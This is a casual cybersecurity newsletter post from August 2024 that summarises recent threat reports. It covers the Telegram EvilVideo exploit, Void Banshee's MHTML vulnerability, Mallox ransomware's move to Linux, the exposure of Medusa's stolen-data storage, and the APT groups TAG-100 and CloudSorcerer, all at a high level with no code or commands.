When the PREDATOR turns into the PREY

Author

8erg
August 01, 2024

Hi my fellow malware enthusiast,

As you have seen in my previous post, the introduction is not my forte; let's see how this one goes... Please bear with me!

Did you know that ransomware was reported in more than 2,500 incidents in the first half of 2024 and the United States was the most-targeted country (I’m not surprised…) and guess what LockBit was responsible for 67% of all incidents (No wonder they were eager to catch them😂)

Yeah, I know hitting you with facts as soon as you start reading is kind of rough for an introduction.

Well, it’s already done, so you might as well continue reading!

📰In today’s newsletter

  • Evil Video Exploit: A Hidden Threat in Telegram's Android App

  • Void Banshee Exploits MHTML Vulnerability: Remote Code Execution Uncovered

  • Mallox Ransomware Expands to Linux: New Tactics and Encryption Techniques

  • When Hackers Become the Hacked: Medusa's Data Theft Exposed

  • New APT Group TAG-100 Unveiled: Tools, Targets, and Tactics in Focus

  • CloudSorcerer: New APT Targets Russian Government with Cloud-Based Tactics

Evil Video Exploit: A Hidden Threat in Telegram's Android App

Security researchers from ESET discovered a zero-day vulnerability called EvilVideo in Telegram's Android app. A threat actor named Ancryno was selling the exploit. This flaw allowed attackers to hide malware in video files. When users clicked on these fake videos, they were prompted to install a harmful file.

Telegram fixed this problem in version 10.14.5, released on July 11, 2024. The exploit was sold online in June 2024 and enabled attackers to spread malware through Telegram channels, groups, and chats.

💡I’m pretty sure this must have caused a lot of damage, to a lot of people…

The malicious files were disguised as 30-second videos, tricking users into downloading them.

The attack worked because Telegram's API allowed these disguised files to be uploaded. However, the exploit did not affect the Web or Windows versions of Telegram.

If a user clicked on the fake video, a message would pop up saying the video couldn't play in Telegram and needed an external player. If the user agreed, they were prompted to install the harmful APK file.

Additionally, users with automatic media download enabled would get the malicious files just by opening the chat or channel where they were shared.

💡When I think about it, I don’t have an Android, so I guess I was safe at that time! Were you?

👉For more details checkout this blog written by Bill Toulas.

Void Banshee Exploits MHTML Vulnerability: Remote Code Execution Uncovered

Trend Micro Zero Day Initiative (ZDI) discovered a serious vulnerability, CVE-2024-38112, that allows hackers to remotely control computers by exploiting MHTML files.

This flaw was immediately reported to Microsoft as ZDI-CAN-24433. It has been used by a hacking group called Void Banshee, which targets regions in North America, Europe, and Southeast Asia to steal information and money.

💡North America always has to be included; they just can’t be left alone😂

Void Banshee used this vulnerability as part of an attack chain involving the Atlantida malware, which has been active and evolving since January 2024. The group’s attacks use internet shortcuts and Microsoft's protocol handlers to exploit the MHTML protocol, allowing them to run malicious code through a disabled Internet Explorer on Windows systems.

Trend Micro tracked these attacks in mid-May 2024, noting that Void Banshee consistently used similar methods to carry out their operations. The MHTML code execution vulnerability enabled the attackers to infect users and organizations with the Atlantida malware.

👉Check out the blog to learn more about the vulnerability and how it’s being used!

Malware is spreading fast in 2024!

A Thales report shows 41% of businesses faced a malware attack this year, making it the fastest-growing threat. New tactics like IDAT Loader variants, steganography, and info-stealers like Chae$ 4.1 are making malware harder to detect.

Exploiting vulnerabilities is also a top attack method, with a 180% increase in such breaches, according to the Verizon 2024 Data Breach Report. Over 17,000 new vulnerabilities have been reported this year, but most organizations can only fix a fraction of them, leaving many exposed.

Mallox Ransomware Expands to Linux: New Tactics and Encryption Techniques

Mallox ransomware, also known as Fargo, TargetCompany, and Mawahelper, has been active since mid-2021 and started using a Ransomware-as-a-Service model in 2022.

Originally, Mallox used .NET-based, .EXE, or .DLL files to attack Windows systems through methods like phishing emails or exploiting exposed MS-SQL servers. Recently, Mallox has expanded to Linux systems. The attackers now use custom Python scripts to deliver the ransomware and steal information.

Once the ransomware is on a system, it encrypts the victim's files and adds a .locked extension to them.

💡Just imagine logging back on your computers and seeing all your files encrypted…

👉Want to know more? Dive into the blog for the full scoop on Mallox ransomware also known as Fargos!

When Hackers Become the Hacked: Medusa's Data Theft Exposed

Recently, Buguard's Dark Atlas Squad turned the tables on the Medusa Ransomware Group during an incident. Due to a security mistake by Medusa, Buguard infiltrated their cloud account and accessed the stolen data.

Medusa used a tool called Rclone to transfer data from their victims to their cloud storage. Rclone supports over 70 cloud services, with mega.nz and mega.io being popular choices for ransomware groups. In this case, Medusa used put.io, which was discovered through a configuration file they accidentally left behind. This slip-up allowed Buguard to gain valuable insight into Medusa's operations.

💡Guys… At least do it properly. Invest in your OPSEC! Let me say it again, invest in your OPSEC!

👉Want to know more? you can read the blog about it!

New APT Group TAG-100 Unveiled: Tools, Targets, and Tactics in Focus

A newly discovered hacking group, TAG-100, is targeting high-profile government and private organizations, mainly in the Asia-Pacific region. This group uses open-source tools and exploits internet-facing devices to gain access. TAG-100's targets include diplomatic entities, religious groups, and political organizations critical of the Chinese government.

The researchers have found that TAG-100 uses two main tools: Pantegana and SparkRAT. Both are written in Go, an open-source programming language. Pantegana can work on various operating systems like Windows, Linux, and macOS, letting hackers remotely control infected computers.

SparkRAT, another tool used by TAG-100, was previously linked to compromised networks, including a Djibouti government network.

The rise of open-source tools means that state-sponsored hackers can now outsource certain operations to less skilled groups or private contractors. This allows advanced groups to avoid using their own specialized tools, making their activities harder to detect and trace.

💡So now they’re delegating!? it’s starting to look like a business to me. What do you think?

👉For more details on this new hacker group, read this blog.

CloudSorcerer: New APT Targets Russian Government with Cloud-Based Tactics

A new APT group called CloudSorcerer has been found targeting Russian government agencies.

Discovered by Kaspersky in May 2024, CloudSorcerer uses cloud services like Microsoft Graph, Yandex Cloud, and Dropbox to hide its activities and manage its control. It also starts by using GitHub for its initial commands.

While it has some similarities to a past APT called CloudWizard, CloudSorcerer uses different malware, suggesting it's a new player using similar cloud-based methods.

👉Want to know more? you can read about it, here!

Remote Code Execution Threat

A serious vulnerability in OpenSSH, known as CVE-2024-6387, has been discovered. It allows attackers to execute code remotely with root privileges on Linux systems, which means they can take full control of the system.

This has raised major concerns in the cybersecurity community.

✉️ Wrapping Up

In the world of malware, understanding is key. As we delve into these threats together, remember that knowledge and vigilance are our best allies.

If you find this newsletter helpful and know others who might benefit from it, I'd be grateful if you could pass it along. 🙏

Until next time, stay informed and keep your defenses sharp. Here’s to staying one step ahead

Thanks for reading!